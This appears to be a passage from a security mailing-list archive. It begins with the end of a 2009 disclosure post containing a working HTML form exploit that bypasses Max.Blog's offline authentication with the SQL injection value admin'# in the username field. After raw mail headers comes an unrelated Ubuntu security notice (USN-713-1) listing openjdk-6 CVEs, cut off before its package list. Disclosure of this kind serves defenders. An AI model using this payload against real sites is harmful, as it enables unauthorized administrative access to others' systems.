############################################################################

- BUGS

Offline Authentication Bypass Exploit:

Requisites: magic quotes = off

File affected: offline_auth.php

This bug allows a guest to bypass an offline authentication service
using an SQL Injection vulnerability.

############################################################################

- CODE

<html>
<head>
<title>
Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
</title>
</head>
<body>
<form action="http://www.site.com/path/offline_auth.php" method="POST">
<input type="text" name="username" value="admin'#" size="15">
<input type="hidden" name="password">
<input type="submit" value="Go!">
</form>
</body>
</html>

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351

From - Wed Jan 28 11:18:39 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d3a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39314-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 91A42ED788
for <lists@securityspace.com>; Wed, 28 Jan 2009 11:14:38 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 16ECA2370E2; Wed, 28 Jan 2009 08:44:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22537 invoked from network); 27 Jan 2009 22:11:26 -0000
Date: Tue, 27 Jan 2009 14:37:30 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-713-1] openjdk-6 vulnerabilities
Message-ID: <20090127223730.GB7859@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="d9ADC0YsG2v16Js0"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.64 on 10.2.0.1
Status:   


--d9ADC0YsG2v16Js0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================
Ubuntu Security Notice USN-713-1           January 27, 2009
openjdk-6 vulnerabilities
CVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350,
CVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354,
CVE-2008-5358, CVE-2008-5359, CVE-2008-5360
==========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  icedtea6-plugin                 6b12-0ubuntu6.1
  openjdk-6-jdk                   6b12-0ubuntu6.1
  openjdk-6-jre                   6b12-0ubuntu6.1
  openjdk-6-jre-headless          6b12-0ubuntu6.1
  openjdk-6-jre-lib               6b12-0ubuntu6.1

After a standard system upgrade you need to restart any Java applications
to effect the necessary changes.

Details follow:

It was discovered that Java did not correctly handle untrusted applets.
If a user were tricked into running a malicious applet, a remote attacker
could gain user privileges, or list directory contents. (CVE-2008-5347,
CVE-2008-5350)

It was discovered that Kerberos authentication and RSA public key
processing were not correctly handled in Java.  A remote attacker
could exploit these flaws to cause a denial of service. (CVE-2008-5348,
CVE-2008-5349)

It was discovered that Java accepted UTF-8 encodings that might be
handled incorrectly by certain applications.  A remote attacker could
bypass string filters, possibly leading to other exploits. (CVE-2008-5351)

Overflows were discovered in Java JAR processing.  If a user or
automated system were tricked into processing a malicious JAR file,
a remote attacker could crash the application, leading to a denial of
service. (CVE-2008-5352, CVE-2008-5354)

It was discovered that Java calendar objects were not unserialized safely.
If a user or automated system were tricked into processing a specially
crafted calendar object, a remote attacker could execute arbitrary code
with user privileges. (CVE-2008-5353)

It was discovered that the Java image handling code could lead to memory
corruption.  If a user or automated system were tricked into processing
a specially crafted image, a remote attacker could crash the application,
leading to a denial of service. (CVE-2008-5358, CVE-2008-5359)

It was discovered that temporary files created by Java had predictable
names.  If a user or automated system were tricked into processing a
specially crafted JAR file, a remote attacker could overwrite sensitive
information.  (CVE-2008-5360)


Updated packages for Ubuntu 8.10:

